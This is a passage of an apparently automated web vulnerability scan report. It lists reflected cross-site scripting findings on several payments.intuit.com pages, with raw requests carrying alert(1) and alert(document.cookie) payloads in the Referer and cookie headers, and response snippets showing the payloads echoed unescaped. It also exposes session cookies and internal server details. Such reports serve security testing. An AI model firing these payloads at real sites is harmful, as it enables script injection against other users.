Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=3d056--><script>alert(1)</script>4284ad0a88b

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:54 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ApFXrC+jgFomvNBkwIsCdQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:55 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CB3320A0805192AA117E345C63285
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92685


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=3d056--><script>alert(1)</script>4284ad0a88b | -->
...[SNIP]...

1.19. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/check-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50dd9'-alert(1)-'453e9ddad06 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=50dd9'-alert(1)-'453e9ddad06

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=o9l6YwbE43TpqpZCRKPeTA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:25 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E12360A0805192AA117E3B77CA933
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101820


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=50dd9'-alert(1)-'453e9ddad06';
                   </script>
...[SNIP]...

1.20. http://payments.intuit.com/products/basic-payment-solutions/check-processing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/check-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d6539--><script>alert(1)</script>9940cd93a6a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/check-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=d6539--><script>alert(1)</script>9940cd93a6a

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:02:41 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=SH8LGCxMaF5781x2Vulb3Q**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:39:42 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95E55E90A0805192AA117E31B06669E
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 101853


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=d6539--><script>alert(1)</script>9940cd93a6a | -->
...[SNIP]...

1.21. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/credit-card-processing-equipment.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fffd5'-alert(1)-'a1adc0270af was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=fffd5'-alert(1)-'a1adc0270af

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:11 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=ZLWBpsz-5u6FkdN2z8+SNg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:12 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9609DEA0A0805192AA117E3D7AC7FC0
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=credit_002dcard_002dprocessing_002dequipment_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 134929


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=fffd5'-alert(1)-'a1adc0270af';
                   </script>
...[SNIP]...

1.22. http://payments.intuit.com/products/basic-payment-solutions/credit-card-processing-equipment.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/credit-card-processing-equipment.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 61f73--><script>alert(1)</script>21df0f4a775 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/credit-card-processing-equipment.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=61f73--><script>alert(1)</script>21df0f4a775

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:24 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=AwCJVZhrS7L9PL77W4UPvA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:25 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960D1CF0A0805192AA117E387C70DA2
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=credit_002dcard_002dprocessing_002dequipment_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 134961


                                                                                                                                                                                                                                                                                                                                                                                                                                   
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=61f73--><script>alert(1)</script>21df0f4a775 | -->
...[SNIP]...

1.23. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/index.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f286'-alert(1)-'8e7fe4c65dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=4f286'-alert(1)-'8e7fe4c65dd

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:19 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=5CWHEzLF1rjja5gV+LodRA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:20 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95B41DF0A0805192AA117E3398C5781
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92653


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=4f286'-alert(1)-'8e7fe4c65dd';
                   </script>
...[SNIP]...

1.24. http://payments.intuit.com/products/basic-payment-solutions/index.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/index.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 248a2--><script>alert(1)</script>58daf8a9700 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/index.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=248a2--><script>alert(1)</script>58daf8a9700

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:36 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=WOX-8RjjKZe+4ObdoWoTxg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:37 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95B81750A0805192AA117E380211446
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92686


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=248a2--><script>alert(1)</script>58daf8a9700 | -->
...[SNIP]...

1.25. http://payments.intuit.com/products/basic-payment-solutions/mobile-credit-card-processing.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/mobile-credit-card-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f767'-alert(1)-'9675c472618 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/mobile-credit-card-processing.jsp?scid=ips_gopay_free_card_reader_banner HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
